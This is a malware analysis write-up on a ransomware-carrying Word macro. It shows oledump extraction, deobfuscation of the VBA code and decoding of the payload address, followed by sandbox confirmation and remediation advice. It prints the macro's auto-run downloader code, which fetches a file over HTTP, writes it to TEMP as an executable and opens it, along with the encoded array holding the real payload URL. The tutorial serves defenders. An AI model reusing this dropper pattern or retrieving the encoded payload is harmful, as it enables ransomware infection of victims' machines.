Macro Malware Analysis

Malware, in general, is any kind of malicious program that executes on a machine; it can be used for a wide variety of purposes, such as altering computer behavior, displaying ads, stealing personal information, taking control of remote machines and so on.

Ransomware

Lately a particular category of malware, called ransomware, has been spreading aggressively, especially through email campaigns. This kind of malicious program infects computers, encrypts their files and asks for a ransom payment to recover them; attackers send emails to a large number of recipients (mass email attack) in order to infect as many machines as possible.
They tend to use social engineering techniques, writing an attractive email subject and text so as to trick users into opening an attachment or a link.
Once the victim opens the downloaded file (which can have different extensions, like “.exe”, “.doc”, “.xls”, “.js”, “.cab”), the malware executes and infects the machine by encrypting data with the RSA-2048 and AES-128 algorithms. Then, the user is shown a screen asking for money in exchange for the key to restore the encrypted data.

Recently, I got my hands on a ransomware variant which abuses Microsoft Office macros to execute evil code. Of course, this one arrived attached to an email as a document with the “.docm” extension, which is the one used for Word documents with macros.
Macros are essentially scripts written in VBA (Visual Basic for Applications), a language used inside Office documents for automating frequent tasks and activities. Since they can interact with the system, attackers can use them as a starting point for the attack.

Macro code deobfuscation

Since the macros of the “.docm” we are dealing with are stored using Object Linking and Embedding (OLE), a Microsoft proprietary technology for compound documents, one possible way to start analyzing this kind of file is to use a very nice utility called oledump: https://blog.didierstevens.com/programs/oledump-py.
This tool allows us to extract the macro code so we can take a look at the source; we launch the program and pass our “.docm” file, which I have renamed “malware.docm”, as the input argument:

root@kali:~/oledump_V0_0_25# ./oledump.py malware.docm 
A: word/vbaProject.bin
 A1:       419 'PROJECT'
 A2:        65 'PROJECTwm'
 A3: M   23316 'VBA/Module1'
 A4: M    1347 'VBA/ThisDocument'
 A5:      4445 'VBA/_VBA_PROJECT'
 A6:      1204 'VBA/__SRP_0'
 A7:       106 'VBA/__SRP_1'
 A8:       292 'VBA/__SRP_2'
 A9:       103 'VBA/__SRP_3'
A10:       572 'VBA/dir'

Oledump returns a list of items describing the document structure; we are interested in the macro code, i.e. items A3 and A4, where the tag M indicates the presence of macros. Once we have identified that the interesting portions are “Module1” (looking at the reported sizes, this should be the core of the script) and “ThisDocument”, we can extract them with the following commands:

root@kali:~/oledump_V0_0_25# ./oledump.py malware.docm -v -s A3 > Module1
root@kali:~/oledump_V0_0_25# ./oledump.py malware.docm -v -s A4 > ThisDocument
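
As an aside on why oledump prefixes every stream with “A: word/vbaProject.bin”: a “.docm” file is a ZIP archive, and the VBA project sits inside it as an embedded OLE file. The following Python sketch lists such members using only the standard library. The function names and the in-memory stand-in archive are made up for illustration, and the sketch does not replace oledump, since it does not parse the OLE streams themselves.

```python
import io
import zipfile


def list_vba_containers(docm):
    """Return the ZIP members of an OOXML document that look like VBA projects.

    `docm` may be a file path or a binary file-like object.
    """
    with zipfile.ZipFile(docm) as archive:
        return [name for name in archive.namelist()
                if name.lower().endswith("vbaproject.bin")]


def build_fake_docm():
    """Build a tiny in-memory stand-in for a .docm (placeholder bytes only)."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<document/>")
        archive.writestr("word/vbaProject.bin", b"placeholder, not a real OLE file")
    buffer.seek(0)
    return buffer


if __name__ == "__main__":
    # With a real sample you would pass its path, e.g. "malware.docm".
    print(list_vba_containers(build_fake_docm()))
```

An empty list for a file with a macro-enabled extension would be worth a second look, but the absence of this member alone should not be read as proof that a document is harmless.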

We can start by taking a look at “ThisDocument”:

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
SAAKASHVILLI_MUDEN "Rastyag"
End Sub

Immediately, something catches the eye: the last three lines define the autoopen() procedure, which launches macro execution as soon as the file is opened; this is a first sign of malware activity.
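
This first check can be automated on the extracted source. The Python sketch below looks for procedures whose names match common Word auto-execution entry points; the list of names is an assumption and is not exhaustive, and the helper name find_auto_exec is hypothetical.

```python
import re

# Common Word auto-execution entry points. This list is an assumption for
# illustration and is not exhaustive.
AUTO_EXEC_NAMES = ("AutoOpen", "AutoExec", "AutoClose",
                   "Document_Open", "Document_Close")

# Matches "Sub name(" at the start of a line, optionally Public/Private.
_SUB_PATTERN = re.compile(
    r"^[ \t]*(?:(?:Public|Private)[ \t]+)?Sub[ \t]+(\w+)[ \t]*\(",
    re.IGNORECASE | re.MULTILINE)


def find_auto_exec(vba_source):
    """Return the names of auto-executing procedures found in VBA source."""
    wanted = {name.lower() for name in AUTO_EXEC_NAMES}
    # VBA identifiers are case-insensitive, so compare in lowercase.
    return [name for name in _SUB_PATTERN.findall(vba_source)
            if name.lower() in wanted]


THIS_DOCUMENT = '''Attribute VB_Name = "ThisDocument"
Sub autoopen()
SAAKASHVILLI_MUDEN "Rastyag"
End Sub
'''

if __name__ == "__main__":
    print(find_auto_exec(THIS_DOCUMENT))  # ['autoopen']
```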
Since there is nothing else here, we can continue the analysis by checking “Module1”. This file is pretty big, but it contains a lot of junk code and uses obfuscation; this is done for two main reasons: one is to decrease the chances of detection by antivirus software and the other is to make it harder for a security analyst to block the attack quickly.
The code starts with some variable definitions; I have reported only the useful ones here:

Attribute VB_Name = "Module1"
 
Public InTheAfrikaMountainsAreHighDAcdaw As Object
Public InTheAfrikaMountainsAreHighPLAPEKCwwed As Object
Public InTheAfrikaMountainsAreHighKSKLAL As Object
Public InTheAfrikaMountainsAreHighXSAOO() As String

Public InTheAfrikaMountainsAreHighLAKOPPC As String
Public InTheAfrikaMountainsAreHighPLAPEKC() As String
Public InTheAfrikaMountainsAreHighUUUKA As String

Public InTheAfrikaMountainsAreHighGMAKO As Object
Public InTheAfrikaMountainsAreHigh4 As String
Public InTheAfrikaMountainsAreHigh2 As String
Public InTheAfrikaMountainsAreHighASALLLP As Variant

The attacker alternates junk code taken from the web with his malicious code hidden inside, but with a little work we can find what we are interested in.

Scrolling down the code, there are three portions suggesting a basic string-encoding technique built on the Replace() function, which has been wrapped in a function named GodnTeBabenParama():

Public Function GodnTeBabenParama(A1 As String, A2 As String, A3 As String) As String
GodnTeBabenParama = Replace(A1, A2, A3)
End Function

InTheAfrikaMountainsAreHigh2 = GodnTeBabenParama("BRREADicroBRRREADoft.XBRREADLHTTPBRRRREADAdodb.BRRREADtrBREADaBRREADBRRRREADBRRREADhBREADll.Appli" _
+ GodnTeBabenParama("cationBRRRREADWBRRREADcript.BRRREADhBREADllBRRRREADProcBREADBRRREADBRRREADBRRRREADGBREADTBRRRREADTBREADBRREADPBRRRREADTypBREADBRRRREADopBREADnBRRRREADwritTRONponBRRREADBREADBodyBRRRREADBRRREADavBREADtofilBREADBRRRREAD", "TRON", "BREADBRRRREADrBREADBRRREAD") _
+ "\zorginBRRREAD.BREADxBREAD", "BREAD", "e")

InTheAfrikaMountainsAreHigh2 = GodnTeBabenParama(InTheAfrikaMountainsAreHigh2, "BRREAD", "M")
InTheAfrikaMountainsAreHigh2 = GodnTeBabenParama(InTheAfrikaMountainsAreHigh2, "BRRREAD", "s")

Lastly, these values are put inside an array by using the Split() function:

InTheAfrikaMountainsAreHighPLAPEKC = Split(InTheAfrikaMountainsAreHigh2, "BRRRREAD")

The result of these substitutions gives a lot of information, since the elements of the array are used in important parts of the code:

InTheAfrikaMountainsAreHighPLAPEKC(0) = Microsoft.XMLHTTP
InTheAfrikaMountainsAreHighPLAPEKC(1) = Adodb.streaM
InTheAfrikaMountainsAreHighPLAPEKC(2) = shell.Application
InTheAfrikaMountainsAreHighPLAPEKC(3) = Wscript.shell
InTheAfrikaMountainsAreHighPLAPEKC(4) = Process
InTheAfrikaMountainsAreHighPLAPEKC(5) = GeT
InTheAfrikaMountainsAreHighPLAPEKC(6) = TeMP
InTheAfrikaMountainsAreHighPLAPEKC(7) = Type
InTheAfrikaMountainsAreHighPLAPEKC(8) = open
InTheAfrikaMountainsAreHighPLAPEKC(9) = write
InTheAfrikaMountainsAreHighPLAPEKC(10) = responseBody
InTheAfrikaMountainsAreHighPLAPEKC(11) = savetofile
InTheAfrikaMountainsAreHighPLAPEKC(12) = \zorgins.exe

The last one is really informative since it is the name of an “.exe” file, which is probably the real payload. This means that there should be a part where the file “zorgins.exe” is downloaded and saved to the system.
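
The substitutions can be replayed outside Office to double-check the array contents. The Python sketch below mirrors the macro's calls in the same order; str.replace() is used as a stand-in for VBA's Replace(), and the names vba_replace and decode_strings are made up for this example.

```python
def vba_replace(text, old, new):
    """Stand-in for the macro's GodnTeBabenParama(), i.e. VBA Replace()."""
    return text.replace(old, new)


def decode_strings():
    # Inner call: expands the "TRON" marker first.
    inner = vba_replace(
        "cationBRRRREADWBRRREADcript.BRRREADhBREADllBRRRREAD"
        "ProcBREADBRRREADBRRREADBRRRREADGBREADTBRRRREAD"
        "TBREADBRREADPBRRRREADTypBREADBRRRREADopBREADnBRRRREAD"
        "writTRONponBRRREADBREADBodyBRRRREAD"
        "BRRREADavBREADtofilBREADBRRRREAD",
        "TRON", "BREADBRRRREADrBREADBRRREAD")

    # Outer call: concatenate the three pieces, then "BREAD" becomes "e".
    text = vba_replace(
        "BRREADicroBRRREADoft.XBRREADLHTTPBRRRREAD"
        "Adodb.BRRREADtrBREADaBRREADBRRRREAD"
        "BRRREADhBREADll.Appli"
        + inner
        + r"\zorginBRRREAD.BREADxBREAD",
        "BREAD", "e")

    # Follow-up substitutions, then the split on the four-R marker.
    text = vba_replace(text, "BRREAD", "M")
    text = vba_replace(text, "BRRREAD", "s")
    return text.split("BRRRREAD")


if __name__ == "__main__":
    for index, value in enumerate(decode_strings()):
        print("(%d) = %s" % (index, value))
```

The order of the calls matters only in that it must match the macro; the markers differ by the number of R characters, so none of them is a substring of another.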
We can then substitute these values every time they appear in the code so as to deobfuscate it (look at the comments):

Set InTheAfrikaMountainsAreHighDAcdaw = CreateObject(InTheAfrikaMountainsAreHighPLAPEKC(0)) ' = CreateObject(Microsoft.XMLHTTP)
Set InTheAfrikaMountainsAreHighPLAPEKCwwed = CreateObject(InTheAfrikaMountainsAreHighPLAPEKC(1)) ' = CreateObject(Adodb.streaM)
Set InTheAfrikaMountainsAreHighGMAKO = CreateObject(InTheAfrikaMountainsAreHighPLAPEKC(2)) ' = CreateObject(shell.Application)
Set InTheAfrikaMountainsAreHigh1DASH1solo = CreateObject(InTheAfrikaMountainsAreHighPLAPEKC(3)) ' = CreateObject(Wscript.shell)
Set InTheAfrikaMountainsAreHighKSKLAL = InTheAfrikaMountainsAreHigh1DASH1solo.Environment(InTheAfrikaMountainsAreHighPLAPEKC(4)) ' = CreateObject(Wscript.shell).Environment(Process)

InTheAfrikaMountainsAreHighLAKOPPC = InTheAfrikaMountainsAreHighKSKLAL(InTheAfrikaMountainsAreHighPLAPEKC(6)) ' = CreateObject(Wscript.shell).Environment(Process)(TeMP)
InTheAfrikaMountainsAreHighUUUKA = InTheAfrikaMountainsAreHighLAKOPPC ' = CreateObject(Wscript.shell).Environment(Process)(TeMP)
InTheAfrikaMountainsAreHighUUUKA = InTheAfrikaMountainsAreHighUUUKA + InTheAfrikaMountainsAreHighPLAPEKC(12) ' = CreateObject(Wscript.shell).Environment(Process)(TeMP)\zorgins.exe
InTheAfrikaMountainsAreHighGMAKO.Open (InTheAfrikaMountainsAreHighUUUKA) ' = CreateObject(shell.Application).Open (CreateObject(Wscript.shell).Environment(Process)(TeMP)\zorgins.exe)

It is clear now that “zorgins.exe” is saved in the TEMP directory; moreover, in the following snippet we have the HTTP GET request for a URL (the malware download), which is stored in “InTheAfrikaMountainsAreHigh4”:

InTheAfrikaMountainsAreHighDAcdaw.Open InTheAfrikaMountainsAreHighPLAPEKC(5), InTheAfrikaMountainsAreHigh4, False ' = CreateObject(Microsoft.XMLHTTP).Open GeT, InTheAfrikaMountainsAreHigh4, False
InTheAfrikaMountainsAreHighDAcdaw.Send ' = CreateObject(Microsoft.XMLHTTP).Send

InTheAfrikaMountainsAreHighASALLLP = InTheAfrikaMountainsAreHighDAcdaw.responseBody ' = CreateObject(Microsoft.XMLHTTP).responseBody
InTheAfrikaMountainsAreHighPLAPEKCwwed.Write InTheAfrikaMountainsAreHighASALLLP ' = CreateObject(Adodb.streaM).Write CreateObject(Microsoft.XMLHTTP).responseBody
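
The manual substitution written in the comments can also be done mechanically. As a rough sketch, the following Python helper rewrites every lookup into the string array as a quoted literal; the helper name inline_lookups is hypothetical, and the values are the ones recovered from the array earlier.

```python
import re

ARRAY_NAME = "InTheAfrikaMountainsAreHighPLAPEKC"

# Values recovered from the Replace()/Split() step, in array order.
VALUES = [
    "Microsoft.XMLHTTP", "Adodb.streaM", "shell.Application", "Wscript.shell",
    "Process", "GeT", "TeMP", "Type", "open", "write",
    "responseBody", "savetofile", "\\zorgins.exe",
]

# Array name immediately followed by "(index)". Longer identifiers that only
# start with the array name (e.g. ...PLAPEKCwwed) are not followed by "(".
_LOOKUP = re.compile(re.escape(ARRAY_NAME) + r"\((\d+)\)")


def inline_lookups(vba_line):
    """Replace array lookups in one line of VBA with the decoded literal."""
    def substitute(match):
        index = int(match.group(1))
        if index >= len(VALUES):
            return match.group(0)  # unknown index: leave the text untouched
        return '"%s"' % VALUES[index]
    return _LOOKUP.sub(substitute, vba_line)


if __name__ == "__main__":
    line = ("Set InTheAfrikaMountainsAreHighDAcdaw = "
            "CreateObject(InTheAfrikaMountainsAreHighPLAPEKC(0))")
    print(inline_lookups(line))
```

Renaming the long junk identifiers would be a natural next step, but that is left out here to keep the sketch short.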

Moving through the code, there is a strange series of numbers separated by the string “112112112112” and saved in the array “InTheAfrikaMountainsAreHighXSAOO”:

InTheAfrikaMountainsAreHighXSAOO = Split("634411211211211270761121121121127076112112112112683211211211211235381121121121122867112112112112286711211211211272591121121121127259112112112112725911211211211228061121121121126832112112112112695411211211211264051121121121127015112112112112664911211211211259171121121121122745112112112112701511211211211269541121121121126588112112112112280611211211211267101121121121126161112112112112707611211211211228671121121121122928112112112112347711211211211271371121121121126344112112112112341611211211211267101121121121127381", "112112112112")

Taking a look at where this variable is used, we find this interesting function:

Public Function DuBirMahnWeishr(InTheAfrikaMountainsAreHigh6 As Integer) As String
Dost = CInt(InTheAfrikaMountainsAreHighXSAOO(InTheAfrikaMountainsAreHigh6))
DuBirMahnWeishr = Chr(Dost / 61)
End Function

which is then used here:

For apdistance = LBound(InTheAfrikaMountainsAreHighXSAOO) To UBound(InTheAfrikaMountainsAreHighXSAOO)
 InTheAfrikaMountainsAreHigh4 = InTheAfrikaMountainsAreHigh4 & DuBirMahnWeishr(apdistance)
 Next apdistance

It divides each value of the array “InTheAfrikaMountainsAreHighXSAOO” by 61, converts the result to the corresponding character using the Chr() function and appends it to “InTheAfrikaMountainsAreHigh4”, the variable seen before that holds the malware download URL.
Converting the first values we get:

root@kali:~# python
>>> chr(6344 // 61)
'h'
>>> chr(7076 // 61)
't'
>>> chr(6832 // 61)
'p'

This looked promising, so I wrote a simple Python script named “decrypt.py” that performs the conversion:

#!/usr/bin/python

# Each value is the character code of one URL character multiplied by 61.
encrypted_address = [6344,7076,7076,6832,3538,2867,2867,7259,7259,7259,2806,6832,6954,6405,7015,6649,5917,2745,7015,6954,6588,2806,6710,6161,7076,2867,2928,3477,7137,6344,3416,6710,7381]

# Integer division, so chr() receives an int on both Python 2 and Python 3.
characters = [chr(x // 61) for x in encrypted_address]

decrypted_address = ''.join(characters)

print('Malware download address: ' + decrypted_address)

After running the script we get the decrypted value:

As I thought, that string was hiding the address used by the macro to download the real payload which is then saved in the temporary directory as “zorgins.exe”; once it executes, it starts encrypting files on the machine.
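
Copying the numbers by hand is error-prone, so a variant of the script can take the raw string from the macro and split it on the separator itself. This is a minimal sketch: the function name decode_url is made up, and for brevity only the first seven values of the macro string are included as sample input.

```python
SEPARATOR = "112112112112"
DIVISOR = 61


def decode_url(raw, separator=SEPARATOR, divisor=DIVISOR):
    """Mirror the macro: Split() on the separator, then Chr(value / 61)."""
    characters = []
    for chunk in raw.split(separator):
        value = int(chunk)
        if value % divisor:
            # A remainder means the chunk was copied or split incorrectly.
            raise ValueError("%d is not a multiple of %d" % (value, divisor))
        characters.append(chr(value // divisor))
    return "".join(characters)


# First seven values of the string passed to Split() in the macro.
RAW_PREFIX = ("6344112112112112" "7076112112112112" "7076112112112112"
              "6832112112112112" "3538112112112112" "2867112112112112"
              "2867")

if __name__ == "__main__":
    print(decode_url(RAW_PREFIX))  # http://
    # Sanity check in the other direction: 'h' is 104, and 104 * 61 = 6344.
    print(ord("h") * DIVISOR)      # 6344
```

Passing the complete string from the macro instead of RAW_PREFIX yields the full download address.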

Sandbox dynamic analysis

As a confirmation of what we have found, we can upload the file to the following website: https://www.hybrid-analysis.com/.
Hybrid Analysis is powered by Payload Security and offers a free service which performs both static and dynamic (behavioral) analysis by interacting with VirusTotal (a free virus, malware and URL online scanning service which uses more than 40 antivirus solutions to execute static analysis), Metadefender (similar to VirusTotal) and running samples in VxStream Sandbox.

Once the analysis is complete, it reports the results back to the user, also showing screenshots captured during the execution:

As the screenshot reports, after the damage has been done, the malware shows the instructions to follow to acquire the decryption key. This can be done by navigating to a website which resides in the Tor network (accessible only by installing the Tor software). Once the victim gets there, the attacker requests payment in Bitcoin (a cryptocurrency whose payments are hard to trace back to a person) and, after the money transfer has been made, the victim should receive the key to restore the documents to their original state.

Analyzing the report, we can verify that the information found during the reverse engineering activity matches the results returned after sandbox execution.

Usage of function AutoOpen():

Name of dropped malware and download URL, including spawned processes:

Going deeper

The analysis performed gives us even more information, such as malicious hosts related to the malware download IP address:

This helps us with further analysis: the service reports that other websites associated with that IP address are also flagged as malicious; in fact, from those addresses it is pretty clear that the attacker has compromised legitimate sites and is now using them to host malware and to carry out phishing activities (look for example at the PayPal reference in the last URL).

Remediation

Once we know the malware download address we can block it by putting the IP address of the website in the firewall/IPS blacklist. A more drastic solution is to create a new rule on the mail server/antispam blocking all attachments with the “.docm” extension.
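
How such a rule is written depends on the mail product in use, so the following is only a sketch of the underlying check in Python, using the standard email package. The names BLOCKED_EXTENSIONS, blocked_attachments and build_sample_message are hypothetical, and the sample message is built in memory purely for demonstration.

```python
import os
from email.message import EmailMessage

# Assumption: extend this set according to local policy.
BLOCKED_EXTENSIONS = {".docm"}


def blocked_attachments(message):
    """Return the filenames of attachments whose extension is blocked."""
    flagged = []
    for part in message.iter_attachments():
        filename = part.get_filename() or ""
        extension = os.path.splitext(filename)[1].lower()
        if extension in BLOCKED_EXTENSIONS:
            flagged.append(filename)
    return flagged


def build_sample_message():
    """Build a harmless test message with two placeholder attachments."""
    message = EmailMessage()
    message["Subject"] = "Invoice"
    message.set_content("Please see the attached invoice.")
    message.add_attachment(b"placeholder", maintype="application",
                           subtype="octet-stream", filename="Invoice.DOCM")
    message.add_attachment(b"placeholder", maintype="application",
                           subtype="pdf", filename="terms.pdf")
    return message


if __name__ == "__main__":
    print(blocked_attachments(build_sample_message()))  # ['Invoice.DOCM']
```

The comparison is done on the lowercased extension because attackers can trivially change the case of a filename; a check on the extension alone can still be bypassed by renaming the file, which is one more reason why user awareness matters.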

Anyway, for this type of attack the best defence is awareness: informing users of possible scams like this one is the best countermeasure you can ever implement.